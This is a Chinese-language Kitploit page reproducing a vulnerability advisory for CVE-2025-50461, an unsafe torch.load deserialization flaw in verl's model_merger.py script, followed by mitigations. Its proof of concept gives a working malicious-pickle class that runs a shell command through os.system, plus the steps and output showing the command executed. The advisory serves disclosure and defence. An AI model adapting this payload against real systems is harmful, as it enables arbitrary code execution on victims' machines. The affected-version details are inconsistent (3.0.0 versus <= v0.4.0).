Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50461 — CVE-2025-50461 的技术细节与漏洞利用 | Kitploit
工具/GitHubGitHub/anchor0221/cve-2025-50461
Payload生成漏洞分析漏洞利用论文与研究学习与教育二进制利用
GitHubanchor0221/cve-2025-50461

CVE-2025-50461

CVE-2025-50461 的技术细节与漏洞利用

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-50461: 不安全模型反序列化导致的远程代码执行(Verl)

Status: RESERVED
此CVE ID已被分配,但尚未在官方CVE列表中发布。

Volcengine 的 verl 3.0.0 中存在一个反序列化漏洞,具体位于使用 "fsdp" 后端的 scripts/model_merger.py 脚本中。该脚本在用户提供的 .pt 文件上以 weights_only=False 调用 torch.load(),如果加载了恶意构造的模型文件,攻击者可以执行任意代码。攻击者可以通过诱骗受害者下载并将恶意模型文件放入本地目录(需符合特定文件名模式)来利用此漏洞。此漏洞可能导致以运行脚本的用户权限执行任意代码。

Description

Affected Repository

  • 项目: volcengine/verl
  • 受影响版本: <= v0.4.0
  • 文件: scripts/model_merger.py
  • GitHub 永久链接: https://github.com/volcengine/verl/blob/v0.3.0.post1/scripts/model_merger.py#L87
  • 依赖: PyTorch < 2.6.0

概念验证 (PoC)

步骤 1: 创建恶意模型文件 (malicious.pt)

root@kitploit:~
import pickle
import os

class Malicious:
    def __reduce__(self):
        return (os.system, ("mkdir HACKED!",))

with open("malicious.pt", "wb") as f:
    pickle.dump(Malicious(), f)

步骤 2: 重命名并放置

root@kitploit:~
mv malicious.pt model_world_size_4_rank_0.pt
mkdir TESTS
mv model_world_size_4_rank_0.pt TESTS/

步骤 3: 执行存在漏洞的脚本

root@kitploit:~
python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"

结果

root@kitploit:~
root@99137c7690ee:/workspace/verl-main# python scripts/model_merger.py --backend="fsdp" --local_dir="TESTS" --hf_model_path="TESTS"
Traceback (most recent call last):
  File "/workspace/verl-main/scripts/model_merger.py", line 440, in <module>
    convert_fsdp_checkpoints_to_hfmodels()
  File "/workspace/verl-main/scripts/model_merger.py", line 88, in convert_fsdp_checkpoints_to_hfmodels
    state_dict = torch.load(os.path.join(local_dir, f'model_world_size_{world_size}_rank_{rank}.pt'),
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1384, in load
    return _legacy_load(
  File "/usr/local/lib/python3.10/dist-packages/torch/serialization.py", line 1630, in _legacy_load
    raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
root@99137c7690ee:/workspace/verl-main# ls
'HACKED!'   Notice.txt   TESTS   docker   examples   outputs   pyproject.toml       requirements.txt          scripts    test_prime.sh   tmp    verl.egg-info
 LICENSE    README.md    data    docs     patches    recipe    requirements_sglang.txt   setup.py   tests           verl   verl_demo.log

命令 mkdir HACKED! 已在受害者的系统上执行。

缓解措施

  • 升级至 PyTorch 2.6.0 或更高版本,该版本默认使用 weights_only=True,降低了反序列化风险。
  • 修改代码,在调用 torch.load 时显式设置 weights_only=True。
  • 实施验证,在加载前检查模型文件的完整性。
  • 教育用户,不要从不可信来源加载模型。

更安全的加载示例:

root@kitploit:~
state_dict = torch.load(path, map_location="cpu", weights_only=True)

CVE 状态

作者

  • 发现者:Yu Rong (戎誉) 和 Hao Fan (凡浩)
  • 联系方式:[[email protected]]
下载工具
字段值
CVE IDCVE-2025-50461
CVSS 评分待定
CWECWE-502: 不可信数据的反序列化
报告日期2025-04-30
披露日期2025-08-15
受影响版本<= v0.4.0
修复版本